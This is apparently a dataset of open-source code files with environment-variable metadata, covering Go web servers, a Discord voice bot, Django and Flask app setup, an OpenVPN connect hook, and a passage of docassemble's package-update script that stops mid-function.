split := strings.SplitN(v, ".", 2)
if len(split) < 2 {
CurrentAd.VideoTypes = append(CurrentAd.VideoTypes, "unknown")
continue
}
CurrentAd.VideoTypes = append(CurrentAd.VideoTypes, "video/"+split[1])
}
}
func Stop() {
atomic.StoreInt32(acceptingRequests, 0)
}
func IsAcceptingRequests() bool {
return atomic.LoadInt32(acceptingRequests) != 0
}
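// runServers starts the plain HTTP server, or, when HTTPS is enabled, an autocert-backed TLS server
// alongside an HTTP listener that answers ACME challenges and redirects to HTTPS.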
func runServers(mainMuxer *goji.Mux) {
if !https {
log.Info("Starting yagpdb web server http:", ListenAddressHTTP)
server := &http.Server{
Addr: ListenAddressHTTP,
Handler: mainMuxer,
IdleTimeout: time.Minute,
}
err := server.ListenAndServe()
if err != nil {
log.Error("Failed http ListenAndServe:", err)
}
} else {
log.Info("Starting yagpdb web server http:", ListenAddressHTTP, ", and https:", ListenAddressHTTPS)
cache := autocert.DirCache("cert")
certManager := autocert.Manager{
Prompt: autocert.AcceptTOS,
HostPolicy: autocert.HostWhitelist(common.Conf.Host, "www."+common.Conf.Host),
Email: common.Conf.Email,
Cache: cache,
}
// launch the redir server
go func() {
unsafeHandler := &http.Server{
Addr: ListenAddressHTTP,
Handler: certManager.HTTPHandler(http.HandlerFunc(httpsRedirHandler)),
IdleTimeout: time.Minute,
}
err := unsafeHandler.ListenAndServe()
if err != nil {
log.Error("Failed http ListenAndServe:", err)
}
}()
tlsServer := &http.Server{
Addr: ListenAddressHTTPS,
Handler: mainMuxer,
IdleTimeout: time.Minute,
TLSConfig: &tls.Config{
GetCertificate: certManager.GetCertificate,
},
}
err := tlsServer.ListenAndServeTLS("", "")
if err != nil {
log.Error("Failed https ListenAndServeTLS:", err)
}
}
}
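// setupRoutes builds the root muxer: request logging, static files, common middleware, the core
// handlers, and the public/API/control-panel sub-muxers, then initializes web plugins.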
func setupRoutes() *goji.Mux {
mux := goji.NewMux()
RootMux = mux
if os.Getenv("YAGPDB_DISABLE_REQUEST_LOGGING") == "" {
requestLogger := &lumberjack.Logger{
Filename: "access.log",
MaxSize: 10,
}
mux.Use(RequestLogger(requestLogger))
}
// Setup fileserver
mux.Handle(pat.Get("/static/*"), http.FileServer(http.Dir(".")))
// General middleware
mux.Use(gziphandler.GzipHandler)
mux.Use(MiscMiddleware)
mux.Use(BaseTemplateDataMiddleware)
mux.Use(SessionMiddleware)
mux.Use(UserInfoMiddleware)
// General handlers
mux.Handle(pat.Get("/"), ControllerHandler(HandleLandingPage, "index"))
mux.HandleFunc(pat.Get("/login"), HandleLogin)
mux.HandleFunc(pat.Get("/confirm_login"), HandleConfirmLogin)
mux.HandleFunc(pat.Get("/logout"), HandleLogout)
// The public muxer, for public server stuff like stats and logs
serverPublicMux := goji.SubMux()
serverPublicMux.Use(ActiveServerMW)
mux.Handle(pat.Get("/public/:server"), serverPublicMux)
mux.Handle(pat.Get("/public/:server/*"), serverPublicMux)
ServerPublicMux = serverPublicMux
ServerPubliAPIMux = goji.SubMux()
ServerPubliAPIMux.Use(ActiveServerMW)
mux.Handle(pat.Get("/api/:server"), ServerPubliAPIMux)
mux.Handle(pat.Get("/api/:server/*"), ServerPubliAPIMux)
ServerPubliAPIMux.Handle(pat.Get("/channelperms/:channel"), RequireActiveServer(APIHandler(HandleChanenlPermissions)))
	// Server selection has its own handler
mux.Handle(pat.Get("/manage"), RenderHandler(HandleSelectServer, "cp_selectserver"))
mux.Handle(pat.Get("/manage/"), RenderHandler(HandleSelectServer, "cp_selectserver"))
mux.Handle(pat.Get("/status"), ControllerHandler(HandleStatus, "cp_status"))
mux.Handle(pat.Get("/status/"), ControllerHandler(HandleStatus, "cp_status"))
mux.Handle(pat.Post("/shard/:shard/reconnect"), ControllerHandler(HandleReconnectShard, "cp_status"))
mux.Handle(pat.Post("/shard/:shard/reconnect/"), ControllerHandler(HandleReconnectShard, "cp_status"))
mux.HandleFunc(pat.Get("/cp"), legacyCPRedirHandler)
mux.HandleFunc(pat.Get("/cp/*"), legacyCPRedirHandler)
// Server control panel, requires you to be an admin for the server (owner or have server management role)
serverCpMuxer := goji.SubMux()
serverCpMuxer.Use(RequireSessionMiddleware)
serverCpMuxer.Use(ActiveServerMW)
serverCpMuxer.Use(RequireServerAdminMiddleware)
mux.Handle(pat.New("/manage/:server"), serverCpMuxer)
mux.Handle(pat.New("/manage/:server/*"), serverCpMuxer)
serverCpMuxer.Handle(pat.Get("/cplogs"), RenderHandler(HandleCPLogs, "cp_action_logs"))
serverCpMuxer.Handle(pat.Get("/cplogs/"), RenderHandler(HandleCPLogs, "cp_action_logs"))
CPMux = serverCpMuxer
for _, plugin := range common.Plugins {
if webPlugin, ok := plugin.(Plugin); ok {
webPlugin.InitWeb()
log.Info("Initialized web plugin:", plugin.Name())
}
}
return mux
}
func httpsRedirHandler(w http.ResponseWriter, r *http.Request) {
http.Redirect(w, r, "https://"+r.Host+r.URL.String(), http.StatusMovedPermanently)
}
func AddGlobalTemplateData(key string, data interface{}) {
globalTemplateData[key] = data
}
func legacyCPRedirHandler(w http.ResponseWriter, r *http.Request) {
log.Println("Hit cp path: ", r.RequestURI)
trimmed := strings.TrimPrefix(r.RequestURI, "/cp")
http.Redirect(w, r, "/manage"+trimmed, http.StatusMovedPermanently)
}
|
[
"\"YAGPDB_ANNOUNCEMENTS_CHANNEL\"",
"\"YAGPDB_AD_IMG_PATH\"",
"\"YAGPDB_AD_LINK\"",
"\"YAGPDB_AD_W\"",
"\"YAGPDB_AD_H\"",
"\"YAGPDB_AD_VIDEO_PATHS\"",
"\"YAGPDB_DISABLE_REQUEST_LOGGING\""
] |
[] |
[
"YAGPDB_AD_IMG_PATH",
"YAGPDB_AD_LINK",
"YAGPDB_ANNOUNCEMENTS_CHANNEL",
"YAGPDB_DISABLE_REQUEST_LOGGING",
"YAGPDB_AD_VIDEO_PATHS",
"YAGPDB_AD_H",
"YAGPDB_AD_W"
] |
[]
|
["YAGPDB_AD_IMG_PATH", "YAGPDB_AD_LINK", "YAGPDB_ANNOUNCEMENTS_CHANNEL", "YAGPDB_DISABLE_REQUEST_LOGGING", "YAGPDB_AD_VIDEO_PATHS", "YAGPDB_AD_H", "YAGPDB_AD_W"]
|
go
| 7 | 0 | |
badger/badgerserver.go
|
/*
Copyright 2016 Crunchy Data Solutions, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package main
import (
"bytes"
"fmt"
"github.com/ant0ine/go-json-rest/rest"
"io/ioutil"
"log"
"net/http"
"os"
"os/exec"
"strconv"
)
const REPORT = "/tmp/badger.html"
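// main starts the badger REST API server on port 10000, exposing /api/badgergenerate and serving
// /tmp under /static.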
func main() {
var VERSION = os.Getenv("CCP_VERSION")
fmt.Println("badgerserver: " + VERSION + " starting")
api := rest.NewApi()
api.Use(rest.DefaultDevStack...)
router, err := rest.MakeRouter(
&rest.Route{"GET", "/badgergenerate", BadgerGenerate},
)
if err != nil {
log.Fatal(err)
}
api.SetApp(router)
http.Handle("/api/", http.StripPrefix("/api", api.MakeHandler()))
http.Handle("/static/", http.StripPrefix("/static", http.FileServer(http.Dir("/tmp"))))
log.Fatal(http.ListenAndServe(":10000", nil))
//log.Fatal(http.ListenAndServeTLS(":10000", "/var/cpm/keys/cert.pem", "/var/cpm/keys/key.pem", nil))
}
// BadgerGenerate runs pgbadger to create the HTML output file
func BadgerGenerate(w rest.ResponseWriter, r *rest.Request) {
fmt.Println("badgerserver: BadgerGenerate called")
	cmd := exec.Command("badger-generate.sh")
var out bytes.Buffer
var stderr bytes.Buffer
cmd.Stdout = &out
cmd.Stderr = &stderr
err := cmd.Run()
if err != nil {
fmt.Println(err.Error())
rest.Error(w, err.Error(), 400)
return
}
fmt.Println("badgerserver: BadgerGenerate run executed")
var buf []byte
buf, err = ioutil.ReadFile(REPORT)
if err != nil {
fmt.Println(err.Error())
rest.Error(w, err.Error(), 400)
return
}
var thing http.ResponseWriter
thing = w.(http.ResponseWriter)
thing.Header().Set("Content-Type", "text/html")
thing.Header().Set("Content-Length", strconv.Itoa(len(buf)))
thing.Write(buf)
fmt.Println("badgerserver: BadgerGenerate report written")
}
|
[
"\"CCP_VERSION\""
] |
[] |
[
"CCP_VERSION"
] |
[]
|
["CCP_VERSION"]
|
go
| 1 | 0 | |
docs/examples/voice/bot.go
|
package main
import (
"os"
"github.com/andersfylling/disgord"
)
const (
MyGuildID = disgord.Snowflake(26854385)
MyChannelID = disgord.Snowflake(93284097324)
)
// This example shows how to let the bot send an audio fragment after receiving a command.
func main() {
client := disgord.New(disgord.Config{
BotToken: os.Getenv("DISCORD_TOKEN"),
})
gateway := client.Gateway()
defer gateway.StayConnectedUntilInterrupted()
var voice disgord.VoiceConnection
gateway.BotReady(func() {
// Once the bot has connected to the websocket, also connect to the voice channel
voice, _ = client.Guild(MyGuildID).VoiceChannel(MyChannelID).Connect(false, true)
})
gateway.MessageCreate(func(_ disgord.Session, m *disgord.MessageCreate) {
// Upon receiving a message with content !airhorn, play a sound to the connection made earlier
if m.Message.Content == "!airhorn" {
f, _ := os.Open("airhorn.dca")
defer f.Close()
_ = voice.StartSpeaking() // Sending a speaking signal is mandatory before sending voice data
_ = voice.SendDCA(f) // Or use voice.SendOpusFrame, this blocks until done sending (realtime audio duration)
_ = voice.StopSpeaking() // Tell Discord we are done sending data.
}
})
}
|
[
"\"DISCORD_TOKEN\""
] |
[] |
[
"DISCORD_TOKEN"
] |
[]
|
["DISCORD_TOKEN"]
|
go
| 1 | 0 | |
yocto/poky/bitbake/lib/toaster/toastermain/wsgi.py
|
"""
# ex:ts=4:sw=4:sts=4:et
# -*- tab-width: 4; c-basic-offset: 4; indent-tabs-mode: nil -*-
#
WSGI config for Toaster project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "Toaster.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "toastermain.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
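# A minimal sketch of such a wrapper (hypothetical class name), kept commented out here:
#
# class PrefixMiddleware(object):
#     """Wraps the Django WSGI application and delegates every request to it."""
#     def __init__(self, wrapped):
#         self.wrapped = wrapped
#     def __call__(self, environ, start_response):
#         # inspect or modify ``environ`` here before delegating
#         return self.wrapped(environ, start_response)
#
# application = PrefixMiddleware(application)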
|
[] |
[] |
[
"DJANGO_SETTINGS_MODULE"
] |
[]
|
["DJANGO_SETTINGS_MODULE"]
|
python
| 1 | 0 | |
server/manage.py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
print('DJANGO_SETTINGS_MODULE', os.environ.get('DJANGO_SETTINGS_MODULE'))
# use separate settings.py for tests
if 'test' in sys.argv:
print('Using settings/development_test.py')
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'opendp_project.settings.development_test')
    elif 'DJANGO_SETTINGS_MODULE' not in os.environ:
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'opendp_project.settings.development')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[] |
[] |
[
"DJANGO_SETTINGS_MODULE"
] |
[]
|
["DJANGO_SETTINGS_MODULE"]
|
python
| 1 | 0 | |
pos_api_project/pos_api_project/asgi.py
|
"""
ASGI config for pos_api_project project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'pos_api_project.settings')
application = get_asgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
conf/connect.py
|
#!/usr/bin/env python3
import os
from pymongo import MongoClient
clients = MongoClient().db.clients
clients.find_one_and_update(
{"cn": os.environ["X509_0_CN"]},
{"$set": {
"ip": os.environ["ifconfig_pool_remote_ip"]
}}
)
|
[] |
[] |
[
"X509_0_CN",
"ifconfig_pool_remote_ip"
] |
[]
|
["X509_0_CN", "ifconfig_pool_remote_ip"]
|
python
| 2 | 0 | |
backend/backend_app.py
|
from datetime import datetime
from dateutil.relativedelta import relativedelta
from collections import defaultdict
import json
import os
import flask
from flask import Flask, jsonify, request
from flask_cors import CORS
from common.mysql_dbms_spark import MysqlDbms
from backend.kafka_utils.producer import produce
application = Flask(__name__)
# CORS
CORS(application)
# run producer
ENDPOINT = 'redshift-cluster-1.c26kfcowhljw.us-west-1.redshift.amazonaws.com'
DATABASE_NAME = 'covid_19'
TABLE_NAME = 'c_19_cases'
IGNORE_VALS = ['Missing', 'NA', None]
USER = os.getenv('RS_USER')
PSWD = os.getenv('RS_PSWD')
# state abv
with open('data/states_abv.json') as states_file:
states_json = json.load(states_file)
@application.route('/getChartInfo', methods=['GET', 'POST'])
def case_endpoint():
"""
post: receive json and add into database
@return:
"""
if request.method == 'POST':
_add_to_db(request.get_json())
res = {"success": True}
else:
res = _get_data_from_query()
# print(res)
return json.dumps(res)
pass
def _add_to_db(cases_data):
"""
@param cases_data: <json>
@return: <boolean> success
"""
print(cases_data)
for case_data in cases_data:
produce(case_data)
pass
def _get_data_from_query():
"""
@return: <boolean> success
<json> data
"""
today = datetime.now()
months_before = today + relativedelta(months=-12) # hard coded to be a year
last_val, first_val = today.strftime('%Y-%m'), months_before.strftime('%Y-%m')
# connect db
dbms = MysqlDbms(ENDPOINT, DATABASE_NAME, TABLE_NAME, USER, PSWD)
pie = _name_value_data(dbms, 'sex', ['Male', 'Female'])
thermodynamic = _name_value_data(dbms, 'res_state')
line = _line_data(dbms, first_val, last_val)
vertical = _xy_data(dbms, 'age_group')
crosswise = _xy_data(dbms, 'process')
# for state names
for state_dict in thermodynamic:
abv = state_dict['name']
state_name = states_json.get(abv)
state_dict['name'] = state_name
return {
"pie": pie,
"line": line,
"thermodynamic": thermodynamic,
"vertical": vertical,
"crosswise": crosswise
}
def _name_value_data(dbms, col_name, cases=None):
"""
@param dbms: <db> dbms object
@param col_name: <str> name of col
@param cases: <list> list of cases eg. ['male', 'female']
@return: <json> data
"""
query_str = """select {}, count(*) as count from {} group by {}""".format(col_name, TABLE_NAME, col_name)
_, query_result = dbms.query(query_str)
# sample query_result: [('NA', 1244276), ('Female', 18846393), ('Male', 17160125), ('Other', 12)]
result_dict = {}
for row in query_result:
result_dict[row[0]] = row[1]
result = []
if not cases:
for key in result_dict.keys():
if key not in IGNORE_VALS:
result.append({"name": key, "value": result_dict[key]})
return result
for case in cases:
if case not in IGNORE_VALS:
result.append({"name": case, "value": result_dict[case]})
return result
pass
def _line_data(dbms, first_val, last_val, col_name='case_month'):
"""
@param dbms: <db> dbms object
@param first_val: <str> like '2021-12'
@param last_val: <str> like '2021-12'
@param col_name: <str> col name, optional
@return: <json> data
"""
query_str = """select {}, count(*) as count from {} group by {}""".format(col_name, TABLE_NAME, col_name)
datetime_first = datetime.strptime(first_val, '%Y-%m')
datetime_last = datetime.strptime(last_val, '%Y-%m')
_, query_result = dbms.query(query_str)
result = []
for row in query_result:
if row[0] not in IGNORE_VALS and (datetime_first <= datetime.strptime(row[0], '%Y-%m') <= datetime_last):
result.append(list(row))
result.sort(key=lambda a: a[0])
return result
pass
def _xy_data(dbms, col_name):
"""
@param dbms: <db> dbms object
@param col_name: <str> col name
@return: <json> data
"""
query_str = """select {}, count(*) as count from {} group by {}""".format(col_name, TABLE_NAME, col_name)
_, query_result = dbms.query(query_str)
result = defaultdict(list)
for row in query_result:
if row[0] not in IGNORE_VALS:
result['yData'].append(row[0])
result['xData'].append(row[1])
return result
pass
if __name__ == '__main__':
application.run(debug=True, host='localhost', port=5001)
|
[] |
[] |
[
"RS_USER",
"RS_PSWD"
] |
[]
|
["RS_USER", "RS_PSWD"]
|
python
| 2 | 0 | |
{{cookiecutter.repo_name}}/python/{{cookiecutter.package_name}}/web/__init__.py
|
# !usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed under a 3-clause BSD license.
#
from __future__ import print_function, division, absolute_import
from flask import Flask, Blueprint
from flask import session, request, render_template, g, jsonify
from inspect import getmembers, isfunction
from {{cookiecutter.package_name}}.web.controllers import index
from {{cookiecutter.package_name}}.web.jinja_filters import jinjablue
from {{cookiecutter.package_name}}.web.error_handlers import errors
from {{cookiecutter.package_name}}.web.extensions import jsglue, flags, sentry, cache, bcrypt, profiler
from {{cookiecutter.package_name}}.web.settings import ProdConfig, DevConfig, CustomConfig
from {{cookiecutter.package_name}}.api.index import MainView
import sys
import os
import logging
# ================================================================================
def create_app(debug=False, local=False, object_config=None):
''' Creates and runs the app '''
# ----------------------------------
# Create App
app_base = os.environ.get('{{cookiecutter.package_name|upper}}_BASE', '{{cookiecutter.package_name}}')
app = Flask(__name__, static_url_path='/{0}/static'.format(app_base))
api = Blueprint("api", __name__, url_prefix='/{0}/api'.format(app_base))
app.debug = debug
# ----------------------------------
# Initialize logging + Sentry + UWSGI config for Production Marvin
# Find which connection to make
# connection = getDbMachine()
# local = (connection == 'local') or local
# ----------------------------------
# Set some environment variables
# os.environ['SAS_REDUX'] = 'sas/mangawork/manga/spectro/redux'
# os.environ['SAS_ANALYSIS'] = 'sas/mangawork/manga/spectro/analysis'
# os.environ['SAS_SANDBOX'] = 'sas/mangawork/manga/sandbox'
# release = os.environ.get('MARVIN_RELEASE', 'mangawork')
# os.environ['SAS_PREFIX'] = 'marvin2' if release == 'mangawork' else 'dr13/marvin'
url_prefix = '/{{cookiecutter.package_name}}' if local else '/{0}'.format(app_base)
# ----------------------------------
# Load the appropriate Flask configuration file for debug or production
if not object_config:
if app.debug or local:
app.logger.info('Loading Development Config!')
object_config = type('Config', (DevConfig, CustomConfig), dict())
else:
app.logger.info('Loading Production Config!')
object_config = type('Config', (ProdConfig, CustomConfig), dict())
app.config.from_object(object_config)
# ------------
# Registration
register_extensions(app, app_base=app_base)
register_api(app, api)
register_blueprints(app, url_prefix=url_prefix)
return app
def register_api(app, api):
''' Register the Flask API routes used '''
MainView.register(api)
app.register_blueprint(api)
def register_extensions(app, app_base=None):
''' Register the Flask extensions used '''
jsglue.JSGLUE_JS_PATH = '/{0}/jsglue.js'.format(app_base)
jsglue.init_app(app)
flags.init_app(app)
bcrypt.init_app(app)
cache.init_app(app)
if app.config['USE_SENTRY']:
sentry.init_app(app)
# Initialize the Flask-Profiler ; see results at localhost:portnumber/app_base/profiler/
if app.config['USE_PROFILER']:
try:
profiler.init_app(app)
except Exception as e:
pass
def register_blueprints(app, url_prefix=None):
''' Register the Flask Blueprints used '''
app.register_blueprint(index.indexblue, url_prefix=url_prefix)
app.register_blueprint(jinjablue)
app.register_blueprint(errors)
|
[] |
[] |
[
"SAS_REDUX",
"SAS_PREFIX",
"SAS_ANALYSIS",
"SAS_SANDBOX",
"{{cookiecutter.package_name|upper}}_BASE",
"MARVIN_RELEASE"
] |
[]
|
["SAS_REDUX", "SAS_PREFIX", "SAS_ANALYSIS", "SAS_SANDBOX", "{{cookiecutter.package_name|upper}}_BASE", "MARVIN_RELEASE"]
|
python
| 6 | 0 | |
docassemble_webapp/docassemble/webapp/update.py
|
import os
import sys
import socket
import tempfile
import subprocess
import xmlrpc.client
import re
#from io import StringIO
import sys
import shutil
import time
import fcntl
from distutils.version import LooseVersion
if __name__ == "__main__":
import docassemble.base.config
docassemble.base.config.load(arguments=sys.argv)
if 'initialize' in sys.argv:
mode = 'initialize'
elif 'check_for_updates' in sys.argv:
mode = 'check_for_updates'
else:
mode = 'initialize'
supervisor_url = os.environ.get('SUPERVISOR_SERVER_URL', None)
if supervisor_url:
USING_SUPERVISOR = True
else:
USING_SUPERVISOR = False
def fix_fnctl():
try:
        flags = fcntl.fcntl(sys.stdout, fcntl.F_GETFL)
        fcntl.fcntl(sys.stdout, fcntl.F_SETFL, flags & ~os.O_NONBLOCK)
sys.stderr.write("fix_fnctl: updated stdout\n")
except:
pass
try:
        flags = fcntl.fcntl(sys.stderr, fcntl.F_GETFL)
        fcntl.fcntl(sys.stderr, fcntl.F_SETFL, flags & ~os.O_NONBLOCK)
sys.stderr.write("fix_fnctl: updated stderr\n")
except:
pass
def remove_inactive_hosts():
start_time = time.time()
sys.stderr.write("remove_inactive_hosts: starting\n")
if USING_SUPERVISOR:
from docassemble.base.config import hostname
from docassemble.webapp.app_object import app
from docassemble.webapp.db_object import db
from docassemble.webapp.core.models import Supervisors
to_delete = set()
for host in Supervisors.query.all():
if host.hostname == hostname:
continue
try:
socket.gethostbyname(host.hostname)
server = xmlrpc.client.Server(host.url + '/RPC2')
result = server.supervisor.getState()
except:
to_delete.add(host.id)
for id_to_delete in to_delete:
Supervisors.query.filter_by(id=id_to_delete).delete()
sys.stderr.write("remove_inactive_hosts: ended after " + str(time.time() - start_time) + " seconds\n")
class DummyPackage(object):
def __init__(self, name):
self.name = name
self.type = 'pip'
self.limitation = None
def check_for_updates(doing_startup=False):
start_time = time.time()
sys.stderr.write("check_for_updates: starting\n")
from docassemble.base.config import hostname
from docassemble.webapp.app_object import app
from docassemble.webapp.db_object import db
from docassemble.webapp.packages.models import Package, Install, PackageAuth
ok = True
here_already = dict()
results = dict()
sys.stderr.write("check_for_updates: 0.5 after " + str(time.time() - start_time) + " seconds\n")
num_deleted = Package.query.filter_by(name='psycopg2').delete()
if num_deleted > 0:
db.session.commit()
num_deleted = Package.query.filter_by(name='pdfminer').delete()
if num_deleted > 0:
db.session.commit()
num_deleted = Package.query.filter_by(name='py-bcrypt').delete()
if num_deleted > 0:
db.session.commit()
num_deleted = Package.query.filter_by(name='pycrypto').delete()
if num_deleted > 0:
db.session.commit()
num_deleted = Package.query.filter_by(name='constraint').delete()
if num_deleted > 0:
db.session.commit()
num_deleted = Package.query.filter_by(name='distutils2').delete()
if num_deleted > 0:
db.session.commit()
sys.stderr.write("check_for_updates: 1 after " + str(time.time() - start_time) + " seconds\n")
installed_packages = get_installed_distributions()
for package in installed_packages:
here_already[package.key] = package.version
changed = False
if 'pdfminer.six' not in here_already:
sys.stderr.write("check_for_updates: installing pdfminer.six\n")
install_package(DummyPackage('pdfminer.six'))
changed = True
if 'psycopg2' in here_already:
sys.stderr.write("check_for_updates: uninstalling psycopg2\n")
uninstall_package(DummyPackage('psycopg2'))
if 'psycopg2-binary' in here_already:
sys.stderr.write("check_for_updates: reinstalling psycopg2-binary\n")
uninstall_package(DummyPackage('psycopg2-binary'))
install_package(DummyPackage('psycopg2-binary'))
changed = True
if 'psycopg2-binary' not in here_already:
sys.stderr.write("check_for_updates: installing psycopg2-binary\n")
install_package(DummyPackage('psycopg2-binary'))
        changed = True
if 'kombu' not in here_already or LooseVersion(here_already['kombu']) <= LooseVersion('4.1.0'):
sys.stderr.write("check_for_updates: installing new kombu version\n")
install_package(DummyPackage('kombu'))
changed = True
if 'celery' not in here_already or LooseVersion(here_already['celery']) <= LooseVersion('4.1.0'):
sys.stderr.write("check_for_updates: installing new celery version\n")
install_package(DummyPackage('celery'))
changed = True
if 'pycrypto' in here_already:
sys.stderr.write("check_for_updates: uninstalling pycrypto\n")
uninstall_package(DummyPackage('pycrypto'))
if 'pycryptodome' in here_already:
sys.stderr.write("check_for_updates: reinstalling pycryptodome\n")
uninstall_package(DummyPackage('pycryptodome'))
install_package(DummyPackage('pycryptodome'))
changed = True
if 'pycryptodome' not in here_already:
sys.stderr.write("check_for_updates: installing pycryptodome\n")
install_package(DummyPackage('pycryptodome'))
changed = True
if 'pdfminer' in here_already:
sys.stderr.write("check_for_updates: uninstalling pdfminer\n")
uninstall_package(DummyPackage('pdfminer'))
changed = True
if 'pdfminer3k' not in here_already:
sys.stderr.write("check_for_updates: installing pdfminer3k\n")
install_package(DummyPackage('pdfminer3k'))
changed = True
if 'py-bcrypt' in here_already:
sys.stderr.write("check_for_updates: uninstalling py-bcrypt\n")
uninstall_package(DummyPackage('py-bcrypt'))
changed = True
if 'bcrypt' in here_already:
sys.stderr.write("check_for_updates: reinstalling bcrypt\n")
uninstall_package(DummyPackage('bcrypt'))
install_package(DummyPackage('bcrypt'))
changed = True
if 'bcrypt' not in here_already:
sys.stderr.write("check_for_updates: installing bcrypt\n")
install_package(DummyPackage('bcrypt'))
changed = True
if changed:
installed_packages = get_installed_distributions()
here_already = dict()
for package in installed_packages:
here_already[package.key] = package.version
packages = dict()
installs = dict()
to_install = list()
to_uninstall = list()
uninstall_done = dict()
uninstalled_packages = dict()
logmessages = ''
package_by_name = dict()
sys.stderr.write("check_for_updates: 2 after " + str(time.time() - start_time) + " seconds\n")
for package in Package.query.filter_by(active=True).all():
package_by_name[package.name] = package
#sys.stderr.write("check_for_updates: database includes a package called " + package.name + " after " + str(time.time() - start_time) + " seconds\n")
# packages is what is supposed to be installed
sys.stderr.write("check_for_updates: 3 after " + str(time.time() - start_time) + " seconds\n")
for package in Package.query.filter_by(active=True).all():
if package.type is not None:
packages[package.id] = package
#sys.stderr.write("check_for_updates: database includes a package called " + package.name + " that has a type after " + str(time.time() - start_time) + " seconds\n")
#print("Found a package " + package.name)
sys.stderr.write("check_for_updates: 4 after " + str(time.time() - start_time) + " seconds\n")
for package in Package.query.filter_by(active=False).all():
if package.name not in package_by_name:
#sys.stderr.write("check_for_updates: database says " + package.name + " should be uninstalled after " + str(time.time() - start_time) + " seconds\n")
uninstalled_packages[package.id] = package # this is what the database says should be uninstalled
sys.stderr.write("check_for_updates: 5 after " + str(time.time() - start_time) + " seconds\n")
for install in Install.query.filter_by(hostname=hostname).all():
installs[install.package_id] = install # this is what the database says in installed on this server
if install.package_id in uninstalled_packages and uninstalled_packages[install.package_id].name not in package_by_name:
sys.stderr.write("check_for_updates: " + uninstalled_packages[install.package_id].name + " will be uninstalled after " + str(time.time() - start_time) + " seconds\n")
to_uninstall.append(uninstalled_packages[install.package_id]) # uninstall if it is installed
changed = False
package_owner = dict()
sys.stderr.write("check_for_updates: 6 after " + str(time.time() - start_time) + " seconds\n")
for auth in PackageAuth.query.filter_by(authtype='owner').all():
package_owner[auth.package_id] = auth.user_id
sys.stderr.write("check_for_updates: 7 after " + str(time.time() - start_time) + " seconds\n")
for package in packages.values():
if package.id not in installs and package.name in here_already:
sys.stderr.write("check_for_updates: package " + package.name + " here already. Writing an Install record for it.\n")
install = Install(hostname=hostname, packageversion=here_already[package.name], version=package.version, package_id=package.id)
db.session.add(install)
installs[package.id] = install
changed = True
if changed:
db.session.commit()
sys.stderr.write("check_for_updates: 8 after " + str(time.time() - start_time) + " seconds\n")
for package in packages.values():
#sys.stderr.write("check_for_updates: processing package id " + str(package.id) + "\n")
#sys.stderr.write("1: " + str(installs[package.id].packageversion) + " 2: " + str(package.packageversion) + "\n")
if (package.packageversion is not None and package.id in installs and installs[package.id].packageversion is None) or (package.packageversion is not None and package.id in installs and installs[package.id].packageversion is not None and LooseVersion(package.packageversion) > LooseVersion(installs[package.id].packageversion)):
sys.stderr.write("check_for_updates: a new version of " + package.name + " is needed because the necessary package version, " + str(package.packageversion) + ", is ahead of the installed version, " + str(installs[package.id].packageversion) + " after " + str(time.time() - start_time) + " seconds\n")
new_version_needed = True
else:
new_version_needed = False
#sys.stderr.write("got here and new version is " + str(new_version_needed) + "\n")
# Check for missing local packages
if (package.name not in here_already) and (package.id in installs):
sys.stderr.write("check_for_updates: the package " + package.name + " is supposed to be installed on this server, but was not detected after " + str(time.time() - start_time) + " seconds\n")
package_missing = True
else:
package_missing = False
if package.id in installs and package.version > installs[package.id].version:
sys.stderr.write("check_for_updates: the package " + package.name + " has internal version " + str(package.version) + " but the installed version has version " + str(installs[package.id].version) + " after " + str(time.time() - start_time) + " seconds\n")
package_version_greater = True
else:
package_version_greater = False
if package.id not in installs:
sys.stderr.write("check_for_updates: the package " + package.name + " is not in the table of installed packages for this server after " + str(time.time() - start_time) + " seconds\n")
if package.id not in installs or package_version_greater or new_version_needed or package_missing:
to_install.append(package)
#sys.stderr.write("done with that" + "\n")
sys.stderr.write("check_for_updates: 9 after " + str(time.time() - start_time) + " seconds\n")
for package in to_uninstall:
#sys.stderr.write("Going to uninstall a package: " + package.name + "\n")
if package.name in uninstall_done:
sys.stderr.write("check_for_updates: skipping uninstallation of " + str(package.name) + " because already uninstalled after " + str(time.time() - start_time) + " seconds" + "\n")
continue
if package.name not in here_already:
sys.stderr.write("check_for_updates: skipping uninstallation of " + str(package.name) + " because not installed" + " after " + str(time.time() - start_time) + " seconds\n")
returnval = 1
newlog = ''
else:
returnval, newlog = uninstall_package(package)
uninstall_done[package.name] = 1
logmessages += newlog
if returnval == 0:
Install.query.filter_by(hostname=hostname, package_id=package.id).delete()
